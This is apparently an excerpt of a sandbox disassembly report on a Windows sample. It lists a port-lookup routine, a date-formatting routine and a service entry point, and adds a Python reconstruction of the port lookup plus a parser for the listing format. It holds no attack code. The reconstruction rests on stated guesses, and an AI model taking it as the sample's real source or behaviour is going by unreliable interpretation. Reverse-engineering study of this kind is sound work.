  • getservbyname.WS2_32, ref: 0041437D
  • htons.WS2_32, ref: 0041439C
  • getaddrinfo.WS2_32, ref: 0041440F
  • htons.WS2_32, ref: 00414433
  • htons.WS2_32, ref: 00414451
  • FreeAddrInfoW.WS2_32, ref: 00414472
Address Instruction Meta Information
00414314 push ebp xrefs 0041993D
00414315 mov ebp, esp
00414317 add esp, FFFFFFD4h
0041431A push ebx
0041431B push esi
0041431C mov ebx, ecx
0041431E mov esi, edx
00414320 mov dword ptr [ebp-04h], eax
00414323 mov eax, dword ptr [ebp-04h]
00414326 call 00404868h
0041432B xor eax, eax
0041432D push ebp
0041432E push 00414496h
00414333 push dword ptr fs:[eax]
00414336 mov dword ptr fs:[eax], esp
00414339 mov word ptr [ebp-06h], 0000h
0041433F mov eax, esi
00414341 call 00413B74h
00414346 test al, al
00414348 jne 004143C5h
0041434A mov eax, dword ptr [0042C8A4h] 00960A4C
0041434F call 00413914h
00414354 xor edx, edx
00414356 push ebp
00414357 push 004143BEh
0041435C push dword ptr fs:[edx]
0041435F mov dword ptr fs:[edx], esp
00414362 push ebx
00414363 call dword ptr [0042B3E0h] getprotobynumber@WS2_32.DLL (Hidden Import)
00414369 mov ebx, eax
0041436B xor eax, eax
0041436D test ebx, ebx
0041436F je 00414383h
00414371 mov eax, dword ptr [ebx]
00414373 push eax
00414374 mov eax, dword ptr [ebp-04h]
00414377 call 00404878h
0041437C push eax
0041437D call dword ptr [0042B3D4h] getservbyname@WS2_32.DLL (Hidden Import)
00414383 test eax, eax xrefs 0041436F
00414385 jne 00414397h
00414387 xor edx, edx
00414389 mov eax, dword ptr [ebp-04h]
0041438C call 00407608h
00414391 mov word ptr [ebp-06h], ax
00414395 jmp 004143A6h
00414397 mov ax, word ptr [eax+08h] xrefs 00414385
0041439B push eax
0041439C call dword ptr [0042B424h] htons@WS2_32.DLL (Hidden Import)
004143A2 mov word ptr [ebp-06h], ax
004143A6 xor eax, eax xrefs 00414395
004143A8 pop edx
004143AA pop ecx Count = 2
004143AB mov dword ptr fs:[eax], edx
004143AE push 00414480h
004143B3 mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 004143C3
004143B8 call 0041391Ch
004143BD ret function end
004143C5 xor eax, eax xrefs 00414348
004143C7 mov dword ptr [ebp-0Ch], eax
004143CA xor edx, edx
004143CC push ebp
004143CD push 00414479h
004143D2 push dword ptr fs:[edx]
004143D5 mov dword ptr fs:[edx], esp
004143D8 lea eax, dword ptr [ebp-2Ch]
004143DB xor ecx, ecx
004143DD mov edx, 00000020h
004143E2 call 00403030h
004143E7 xor eax, eax
004143E9 mov dword ptr [ebp-28h], eax
004143EC mov eax, dword ptr [ebp+08h]
004143EF mov dword ptr [ebp-24h], eax
004143F2 mov dword ptr [ebp-20h], ebx
004143F5 mov dword ptr [ebp-2Ch], 00000001h
004143FC lea eax, dword ptr [ebp-0Ch]
004143FF push eax
00414400 lea eax, dword ptr [ebp-2Ch]
00414403 push eax
00414404 mov eax, dword ptr [ebp-04h]
00414407 call 00404878h
0041440C push eax
0041440D push 00000000h
0041440F call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00414415 test eax, eax
00414417 jne 0041445Bh
00414419 cmp dword ptr [ebp-0Ch], 00000000h
0041441D je 0041445Bh
0041441F mov eax, dword ptr [ebp-0Ch]
00414422 cmp dword ptr [eax+04h], 02h
00414426 jne 0041443Dh
00414428 mov eax, dword ptr [ebp-0Ch]
0041442B mov eax, dword ptr [eax+18h]
0041442E mov ax, word ptr [eax+02h]
00414432 push eax
00414433 call dword ptr [0042B424h] htons@WS2_32.DLL (Hidden Import)
00414439 mov word ptr [ebp-06h], ax
0041443D mov eax, dword ptr [ebp-0Ch] xrefs 00414426
00414440 cmp dword ptr [eax+04h], 17h
00414444 jne 0041445Bh
00414446 mov eax, dword ptr [ebp-0Ch]
00414449 mov eax, dword ptr [eax+18h]
0041444C mov ax, word ptr [eax+02h]
00414450 push eax
00414451 call dword ptr [0042B424h] htons@WS2_32.DLL (Hidden Import)
00414457 mov word ptr [ebp-06h], ax
0041445B xor eax, eax xrefs 00414417, 0041441D, 00414444
0041445D pop edx
0041445F pop ecx Count = 2
00414460 mov dword ptr fs:[eax], edx
00414463 push 00414480h
00414468 cmp dword ptr [ebp-0Ch], 00000000h xrefs 0041447E
0041446C je 00414478h
0041446E mov eax, dword ptr [ebp-0Ch]
00414471 push eax
00414472 call dword ptr [0042B450h] FreeAddrInfoW@WS2_32.DLL (Hidden Import)
00414478 ret xrefs 0041446C function end
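Read as a whole, the routine starting at 00414314 takes a string (eax), a socket type (stack argument at [ebp+08h]) and a protocol number (ecx) and leaves a 16-bit port in [ebp-06h]: one branch goes getprotobynumber -> getservbyname -> htons(s_port) and falls back to a string-to-integer conversion, the other fills a zeroed 32-byte addrinfo hints block (ai_flags = 1, AI_PASSIVE; ai_family = 0; ai_socktype and ai_protocol from the arguments), calls getaddrinfo(NULL, name, &hints, &res) and reads sin_port / sin6_port from the first result when ai_family is 2 (AF_INET) or 23 (AF_INET6 on Windows). The Python below is an added reconstruction of that logic for reference while reading the listing; it is an interpretation, not the sample's source. Assumptions: the predicate called at 00414341 cannot be identified from the listing and is modelled as a `use_getaddrinfo` flag; the call at 0041438C (edx = 0) is taken to be a string-to-integer conversion with default 0; and since Python has no getprotobynumber binding, a two-entry table stands in for it.

```python
"""Reconstruction of the port-lookup routine at 00414314 (assumed reading of the listing)."""
import socket

# Stand-in for getprotobynumber (no Python binding); assumed to cover the
# protocol numbers the routine is called with.
PROTO_NAMES = {socket.IPPROTO_TCP: "tcp", socket.IPPROTO_UDP: "udp"}


def port_via_getservbyname(service, proto):
    """Branch at 0041434A: getprotobynumber, getservbyname, htons(s_port);
    otherwise the assumed StrToIntDef(service, 0), truncated to 16 bits
    by the 'mov word ptr [ebp-06h], ax' at 00414391."""
    proto_name = PROTO_NAMES.get(proto)
    if proto_name is not None:
        try:
            return socket.getservbyname(service, proto_name)  # already host byte order
        except OSError:
            pass  # no servent: fall through to the numeric conversion
    try:
        return int(service) & 0xFFFF
    except ValueError:
        return 0


def port_via_getaddrinfo(service, socktype, proto):
    """Branch at 004143C5: getaddrinfo(NULL, service, hints{AI_PASSIVE, 0,
    socktype, proto}); only the first addrinfo entry is examined, and only
    AF_INET / AF_INET6 yield a port (the local stays 0 otherwise)."""
    try:
        results = socket.getaddrinfo(None, service, 0, socktype, proto, socket.AI_PASSIVE)
    except OSError:        # getaddrinfo returned non-zero: [ebp-0Ch] stays NULL
        return 0
    if not results:
        return 0
    family, _, _, _, sockaddr = results[0]
    if family in (socket.AF_INET, socket.AF_INET6):
        return sockaddr[1]  # sin_port / sin6_port, host byte order
    return 0


def resolve_port(service, socktype=socket.SOCK_STREAM,
                 proto=socket.IPPROTO_TCP, use_getaddrinfo=True):
    """Entry point mirroring 00414314; use_getaddrinfo models the
    unidentified predicate tested at 00414341."""
    if use_getaddrinfo:
        return port_via_getaddrinfo(service, socktype, proto)
    return port_via_getservbyname(service, proto)


if __name__ == "__main__":
    for name in ("8080", "no-such-service-zz"):
        print(name, resolve_port(name), resolve_port(name, use_getaddrinfo=False))
```

Neither branch needs network access for a numeric string, which is why a sandbox shows no DNS traffic from this helper; the getaddrinfo branch only resolves a service name, never a host, because the node-name argument is pushed as NULL.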
APIs
  • GetThreadLocale.KERNEL32, ref: 00408DEC
  • GetDateFormatA.KERNEL32, ref: 00408DF2
Address Instruction Meta Information
00408D74 push ebp xrefs 004091A8
00408D75 mov ebp, esp
00408D77 add esp, FFFFFEE8h
00408D7D push ebx
00408D7E push esi
00408D7F xor ecx, ecx
00408D81 mov dword ptr [ebp-00000118h], ecx
00408D87 mov dword ptr [ebp-04h], ecx
00408D8A mov ebx, edx
00408D8C mov esi, eax
00408D8E xor eax, eax
00408D90 push ebp
00408D91 push 00408EC2h
00408D96 push dword ptr fs:[eax]
00408D99 mov dword ptr fs:[eax], esp
00408D9C mov eax, ebx
00408D9E call 004043DCh
00408DA3 mov eax, dword ptr [ebp+08h]
00408DA6 mov ax, word ptr [eax-0Eh]
00408DAA mov word ptr [ebp-14h], ax
00408DAE mov eax, dword ptr [ebp+08h]
00408DB1 mov ax, word ptr [eax-10h]
00408DB5 mov word ptr [ebp-12h], ax
00408DB9 mov eax, dword ptr [ebp+08h]
00408DBC mov ax, word ptr [eax-12h]
00408DC0 mov word ptr [ebp-0Eh], ax
00408DC4 lea eax, dword ptr [ebp-04h]
00408DC7 mov edx, 00408ED8h
00408DCC call 00404474h
00408DD1 push 00000100h
00408DD6 lea eax, dword ptr [ebp-00000114h]
00408DDC push eax
00408DDD mov eax, dword ptr [ebp-04h]
00408DE0 call 00404878h
00408DE5 push eax
00408DE6 lea eax, dword ptr [ebp-14h]
00408DE9 push eax
00408DEA push 00000004h
00408DEC call 004061ECh GetThreadLocale@KERNEL32.DLL (Hidden Import)
00408DF1 push eax
00408DF2 call 0040618Ch GetDateFormatA@KERNEL32.DLL (Hidden Import)
00408DF7 test eax, eax
00408DF9 je 00408EA1h
00408DFF mov eax, ebx
00408E01 lea edx, dword ptr [ebp-00000114h]
00408E07 mov ecx, 00000100h
00408E0C call 0040464Ch
00408E11 dec esi
00408E12 jne 00408EA1h
00408E18 mov eax, dword ptr [0042C73Ch] 00000009
00408E1D sub eax, 04h
00408E20 je 00408E44h
00408E22 sub eax, 0Dh
00408E25 jne 00408EA1h
00408E27 push ebx
00408E28 mov eax, dword ptr [ebx]
00408E2A mov edx, 00000001h
00408E2F call 0040B320h
00408E34 mov ecx, eax
00408E36 mov eax, dword ptr [ebx]
00408E38 mov edx, 00000001h
00408E3D call 004048D8h
00408E42 jmp 00408EA1h
00408E44 cmp dword ptr [0042C740h], 01h xrefs 00408E20
00408E4B jne 00408EA1h
00408E4D mov eax, dword ptr [ebx]
00408E4F call 00404678h
00408E54 mov edx, eax
00408E56 mov eax, dword ptr [ebx]
00408E58 call 0040B1ACh
00408E5D cmp eax, 04h
00408E60 jne 00408EA1h
00408E62 mov eax, dword ptr [ebx]
00408E64 mov edx, 00000003h
00408E69 call 0040B2BCh
00408E6E mov esi, eax
00408E70 lea eax, dword ptr [ebp-00000114h]
00408E76 add esi, eax
00408E78 dec esi
00408E79 lea eax, dword ptr [ebp-00000118h]
00408E7F mov edx, esi
00408E81 call 004045D4h
00408E86 mov eax, dword ptr [ebp-00000118h]
00408E8C mov edx, 00000002h
00408E91 call 0040B320h
00408E96 mov ecx, eax
00408E98 mov eax, ebx
00408E9A mov edx, esi
00408E9C call 004044CCh
00408EA1 xor eax, eax xrefs 00408DF9, 00408E12, 00408E4B, 00408E60, 00408E25, 00408E42
00408EA3 pop edx
00408EA5 pop ecx Count = 2
00408EA6 mov dword ptr fs:[eax], edx
00408EA9 push 00408EC9h
00408EAE lea eax, dword ptr [ebp-00000118h] xrefs 00408EC7
00408EB4 call 004043DCh
00408EB9 lea eax, dword ptr [ebp-04h]
00408EBC call 004043DCh
00408EC1 ret function end
APIs
  • RegisterServiceCtrlHandlerA.ADVAPI32, ref: 00429A4C
  • SetServiceStatus.ADVAPI32, ref: 00429A6E
  • CreateThread.KERNEL32, ref: 00429A89
  • WaitForSingleObject.KERNEL32, ref: 00429A9B
  • CloseHandle.KERNEL32, ref: 00429AA6
Address Instruction Meta Information
00429A0C push ebp
00429A0D mov ebp, esp
00429A0F push ecx
00429A10 push ebx
00429A11 mov ebx, 0042CAA4h
00429A16 mov dword ptr [ebx], 00000030h
00429A1C mov dword ptr [ebx+04h], 00000002h
00429A23 xor eax, eax
00429A25 mov dword ptr [ebx+08h], eax
00429A28 xor eax, eax
00429A2A mov dword ptr [ebx+0Ch], eax
00429A2D xor eax, eax
00429A2F mov dword ptr [ebx+10h], eax
00429A32 xor eax, eax
00429A34 mov dword ptr [ebx+14h], eax
00429A37 xor eax, eax
00429A39 mov dword ptr [ebx+18h], eax
00429A3C push 004299F0h
00429A41 mov eax, dword ptr [0042DA9Ch] 009610D0
00429A46 call 00404878h
00429A4B push eax
00429A4C call 00421BBCh RegisterServiceCtrlHandlerA@ADVAPI32.DLL (Hidden Import)
00429A51 mov dword ptr [0042CAC0h], eax
00429A56 mov dword ptr [ebx+04h], 00000004h
00429A5D xor eax, eax
00429A5F mov dword ptr [ebx+14h], eax
00429A62 xor eax, eax
00429A64 mov dword ptr [ebx+18h], eax
00429A67 push ebx
00429A68 mov eax, dword ptr [0042CAC0h] 0014DF20
00429A6D push eax
00429A6E call 00421BB4h SetServiceStatus@ADVAPI32.DLL (Hidden Import)
00429A73 call 00422504h
00429A78 lea eax, dword ptr [ebp-04h]
00429A7B push eax
00429A7E push 00000000h Count = 2
00429A80 push 00429A04h
00429A87 push 00000000h Count = 2
00429A89 call 00421B8Ch CreateThread@KERNEL32.DLL (Hidden Import)
00429A8E mov dword ptr [0042CAA0h], eax
00429A93 push FFFFFFFFh
00429A95 mov eax, dword ptr [0042CAA0h] 00000000
00429A9A push eax
00429A9B call 00421B9Ch WaitForSingleObject@KERNEL32.DLL (Hidden Import)
00429AA0 mov eax, dword ptr [0042CAA0h] 00000000
00429AA5 push eax
00429AA6 call 00421BA4h CloseHandle@KERNEL32.DLL (Hidden Import)
00429AAB pop ebx
00429AAC pop ecx
00429AAD pop ebp
00429AAE retn 000Ch function end
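The listing above follows a fixed shape: an "APIs" bullet list (name.MODULE, ref: address), an "Address Instruction Meta Information" header, then one instruction per line with call sites annotated as "name@MODULE.DLL (Hidden Import)" or "(Import)". Note that the tool prints "function end" after every ret, so the routine at 00414314 shows two of them (004143BD and 00414478) because its exception-handler epilogue returns on its own. The Python below is an added example, not part of the report or of the sandbox's tooling: a parser for this format that delimits routines by the header line, records every "function end", collects the Hidden Import call targets, and cross-checks that each APIs-block ref has a matching annotated call line. The embedded SAMPLE is an excerpt of the listing above (only the annotated lines of two routines are kept).

```python
"""Parser for the disassembly listing format used in this report (added example)."""
import re
from dataclasses import dataclass, field

# "  • name.MODULE, ref: ADDR" bullets under an "APIs" heading
API_RE = re.compile(r"^\s*[•*-]?\s*([^.\s]+)\.(\S+?),\s*ref:\s*([0-9A-Fa-f]{8})")
INSN_RE = re.compile(r"^([0-9A-Fa-f]{8})\s+(.*)$")
IMPORT_RE = re.compile(r"(\w+)@([\w.]+)\s*\((Hidden Import|Import)\)")
XREFS_RE = re.compile(r"xrefs\s+([0-9A-Fa-f]{8}(?:,\s*[0-9A-Fa-f]{8})*)")
HEADER = "Address Instruction Meta Information"


@dataclass
class Routine:
    apis: list                                    # (name, module, ref) from the APIs block
    start: int = 0                                # address of the first instruction
    callers: list = field(default_factory=list)   # xrefs on the first instruction
    imports: list = field(default_factory=list)   # (addr, name, module, kind)
    rets: list = field(default_factory=list)      # every address marked "function end"


def parse_listing(text):
    """One Routine per header line; 'function end' lines are recorded, not used as boundaries."""
    routines, pending, cur = [], [], None
    for line in text.splitlines():
        line = line.rstrip()
        if line.strip() == HEADER:
            if cur is not None:
                routines.append(cur)
            cur, pending = Routine(apis=pending), []
            continue
        m = API_RE.match(line)
        if m:                         # bullets precede the header of the routine they belong to
            pending.append((m[1], m[2], int(m[3], 16)))
            continue
        m = INSN_RE.match(line)
        if not m or cur is None:
            continue
        addr, rest = int(m[1], 16), m[2]
        if cur.start == 0:
            cur.start = addr
            x = XREFS_RE.search(rest)
            if x:
                cur.callers = [int(a, 16) for a in re.split(r",\s*", x[1])]
        im = IMPORT_RE.search(rest)
        if im:
            cur.imports.append((addr, im[1], im[2], im[3]))
        if rest.endswith("function end"):
            cur.rets.append(addr)
    if cur is not None:
        routines.append(cur)
    return routines


def hidden_imports(r):
    """Call targets the listing marks 'Hidden Import', in address order."""
    return [name for _, name, _, kind in r.imports if kind == "Hidden Import"]


def unmatched_refs(r):
    """APIs-block entries whose ref address carries no call annotation."""
    annotated = {addr for addr, *_ in r.imports}
    return [(n, mod, ref) for n, mod, ref in r.apis if ref not in annotated]


# Excerpt of the listing above (annotated lines only).
SAMPLE = """\
APIs
  • RegisterServiceCtrlHandlerA.ADVAPI32, ref: 00429A4C
  • SetServiceStatus.ADVAPI32, ref: 00429A6E
  • CreateThread.KERNEL32, ref: 00429A89
  • WaitForSingleObject.KERNEL32, ref: 00429A9B
  • CloseHandle.KERNEL32, ref: 00429AA6
Address Instruction Meta Information
00429A0C push ebp
00429A4C call 00421BBCh RegisterServiceCtrlHandlerA@ADVAPI32.DLL (Hidden Import)
00429A6E call 00421BB4h SetServiceStatus@ADVAPI32.DLL (Hidden Import)
00429A89 call 00421B8Ch CreateThread@KERNEL32.DLL (Hidden Import)
00429A9B call 00421B9Ch WaitForSingleObject@KERNEL32.DLL (Hidden Import)
00429AA6 call 00421BA4h CloseHandle@KERNEL32.DLL (Hidden Import)
00429AAE retn 000Ch function end
APIs
  • getprotobynumber.WS2_32, ref: 00414363
  • getaddrinfo.WS2_32, ref: 0041440F
  • FreeAddrInfoW.WS2_32, ref: 00414472
Address Instruction Meta Information
00414314 push ebp xrefs 0041993D
00414363 call dword ptr [0042B3E0h] getprotobynumber@WS2_32.DLL (Hidden Import)
004143BD ret function end
0041440F call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00414472 call dword ptr [0042B450h] FreeAddrInfoW@WS2_32.DLL (Hidden Import)
00414478 ret xrefs 0041446C function end
"""

if __name__ == "__main__":
    for r in parse_listing(SAMPLE):
        print(f"{r.start:08X} rets={[f'{a:08X}' for a in r.rets]} hidden={hidden_imports(r)}")
```

Run over the full report text, the same functions give a per-routine inventory of dynamically annotated call targets (the five ADVAPI32/KERNEL32 calls of the service entry at 00429A0C, for instance) and flag any APIs bullet that the instruction lines do not back up, which is the first consistency check worth doing before reading further into a listing.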